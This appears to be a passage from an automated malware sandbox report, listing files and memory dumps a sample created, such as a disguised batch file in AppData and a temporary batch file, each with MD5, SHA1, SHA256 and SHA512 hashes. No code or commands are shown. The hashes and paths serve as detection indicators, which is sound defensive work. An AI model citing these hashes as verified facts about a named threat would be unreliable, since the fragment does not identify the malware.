| SHA512 | 8cc439fb9d07500383eab15822d6794fbe8b9a5ccdb024c6c9cac27dea4a76afda54255477f27ecdca013e3a68c4c7278cbcec01be1e6095cf13c3f7cb2e4441 |
C:\Users\Admin\AppData\Roaming\Windows_Log_446.bat
| MD5 | 561c4ecf6ab3848d4d45ee983b5e6bd3 |
| SHA1 | 11e581a4bd84cad824f1dfce89962ab593b4193a |
| SHA256 | 2b7272581314f0f4b3cd41c32cc9ebd5950eb1acf67601bd6bdf1365aacc8eab |
| SHA512 | 1f6f460a4df29eb2a2b1f8bb932e549e51c4b257c3ce6808038d877a50fa3b8bccaea38aa900d00e9207a764f7aebfc0f9a7b5a07bc53a9902544e0d280ad716 |
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 3ec0d76d886b2f4b9f1e3da7ce9e2cd7 |
| SHA1 | 68a6a2b7b0fa045cd9cf7d63d4e30600a7b25dea |
| SHA256 | 214be9e8293b00fc05089068033edb41da350e0f127dd782bf6cb748000a56a5 |
| SHA512 | a49d758d03e3a7bc38be29d577c3e0d0c69eb08d0496a81b9406b446c5808d7dfbab39c5be3b45cbb4aec511d87c6166453cbd12cebe5d8663a60b5d773206c6 |
memory/1956-44-0x000001E26EF90000-0x000001E26EFA6000-memory.dmp
memory/3644-45-0x00007FFF96E00000-0x00007FFF978C2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 20573d05fc1acef706ffbdd4dc9f45dc |
| SHA1 | defd35463b3433657ebb00de76d5f0cd0b81c81b |
| SHA256 | 0a2b951533b29655270b941077bbf34ba21a5a59aebaf9948130ff31c7adf808 |
| SHA512 | 8eca0f79e84f4018dd01d5c24b3f7e3b62a8ed7b186e1d918d4452e8f0c7a66b5e92efb74b76d22339a8bad7818147ee486582b384ca99db31e44e3219daf7b7 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1a9fa92a4f2e2ec9e244d43a6a4f8fb9 |
| SHA1 | 9910190edfaccece1dfcc1d92e357772f5dae8f7 |
| SHA256 | 0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888 |
| SHA512 | 5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | cef328ddb1ee8916e7a658919323edd8 |
| SHA1 | a676234d426917535e174f85eabe4ef8b88256a5 |
| SHA256 | a1b5b7ada8ebc910f20f91ada3991d3321104e9da598c958b1edac9f9aca0e90 |
| SHA512 | 747400c20ca5b5fd1b54bc24e75e6a78f15af61df263be932d2ee7b2f34731c2de8ce03b2706954fb098c1ac36f0b761cf37e418738fa91f2a8ea78572f545cb |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4914eb0b2ff51bfa48484b5cc8454218 |
| SHA1 | 6a7c3e36ce53b42497884d4c4a3bda438dd4374b |
| SHA256 | 7e510fc9344ef239ab1ab650dc95bb25fd44e2efba8b8246a3ac17880ee8b69e |
| SHA512 | 83ab35f622f4a5040ca5cb615a30f83bb0741449225f1fd1815b6923e225c28241d0c02d34f83f743349a5e57f84ca1c6f44016797a93d5985be41d11be79500 |
memory/1956-92-0x000001E26EF80000-0x000001E26EF8C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmpB10D.tmp.bat
| MD5 | 4c221033fb391ea41dc631bcda3de4e3 |
| SHA1 | 5cad930ee31c7bdda2cadcaa81ca4a8bbc09b185 |
| SHA256 | 4614ec05e77fda5b5c2521cf1782d4952b061f5e6183aa9f601aea7a7a6cc541 |
| SHA512 | 4848a5d55988e10088875b766b2747d69ccec145c04c9c0124569108a0d935b386555a8b0d63afd4036bd2064d8c3fb3c63067da297e91216874bb130297ef3a |